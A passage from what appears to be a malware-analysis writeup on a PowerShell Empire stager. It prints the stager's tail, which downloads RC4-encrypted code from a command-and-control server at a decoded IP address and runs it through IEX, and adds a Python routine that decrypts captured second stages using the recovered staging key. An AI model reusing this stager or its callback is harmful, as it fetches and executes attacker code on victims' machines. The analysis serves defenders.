$S[$I],$S[$H]=$S[$H],$S[$I];
$_-bxor$S[($S[$I]+$S[$H])%256]
}
};
$wc.Headers.Add("Cookie","hlFKsAOj=YbML71kRmKeA503M8Vjs8W8W4fY=");
$data=$wc.DownloadData($ser+$t);
$iv=$data[0..3];
$data=$data[4..$data.length];
-join[Char[]](& $R $data ($IV+$K))|IEX
Which also calls back to 128.199.95.189:8080:
$ echo aAB0AHQAcAA6AC8ALwAxADIAOAAuADEAOQA5AC4AOQA1AC4AMQA4ADkAOgA4ADAAOAAwAA== | base64 -d
http://128.199.95.189:8080
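The $R script block in the stager is plain RC4: a key-scheduling loop over $K, then a keystream loop that XORs each byte of the downloaded data, with the key being the first four response bytes ($iv) prepended to the staging key. With the staging key recovered from the artifact, a defender holding a capture of the /news.php response can therefore decrypt the second stage offline. The following is an added example, not part of the original writeup or of Empire, that reimplements that routine in Python; the staging key is the one shown above, and the encrypted response in the test is constructed locally (RC4 is symmetric, so the same function stands in for the server side).

```python
# Staging key embedded in the stager recovered from NTUSER.DAT (from the writeup)
STAGING_KEY = b"xF}DlXKtjZ9/zaS2>smYiUC+;-yLqQOp"


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 exactly as the $R script block does it: KSA over the key, then PRGA."""
    if not key:
        raise ValueError("empty key")
    # Key-scheduling: 0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256; swap}
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    # Keystream: $D|%{$I=($I+1)%256;$H=($H+$S[$I])%256; swap; $_ -bxor $S[($S[$I]+$S[$H])%256]}
    out = bytearray()
    i = h = 0
    for byte in data:
        i = (i + 1) % 256
        h = (h + s[i]) % 256
        s[i], s[h] = s[h], s[i]
        out.append(byte ^ s[(s[i] + s[h]) % 256])
    return bytes(out)


def decrypt_stage(response: bytes, staging_key: bytes = STAGING_KEY) -> str:
    """Mirror of: $iv=$data[0..3]; $data=$data[4..]; -join[Char[]](& $R $data ($IV+$K)).
    [Char] on a byte is a code-point cast, i.e. latin-1 decoding."""
    if len(response) < 4:
        raise ValueError("response shorter than the 4-byte IV")
    iv, body = response[:4], response[4:]
    return rc4(iv + staging_key, body).decode("latin-1")


def build_sample_response(iv: bytes, plaintext: str, staging_key: bytes = STAGING_KEY) -> bytes:
    """Constructed server side for testing: IV || RC4(IV || K, plaintext)."""
    if len(iv) != 4:
        raise ValueError("IV must be 4 bytes")
    return iv + rc4(iv + staging_key, plaintext.encode("latin-1"))


if __name__ == "__main__":
    sample = build_sample_response(b"\x01\x02\x03\x04", "Write-Host 'constructed stage 2'")
    print(decrypt_stage(sample))
```

The per-response IV only varies the first four key bytes, so every stage served by this listener is recoverable from the single staging key; that is why the key string in the artifact (the same one compiled into the Sharpire binary above) is the value to pivot on when reviewing captured traffic.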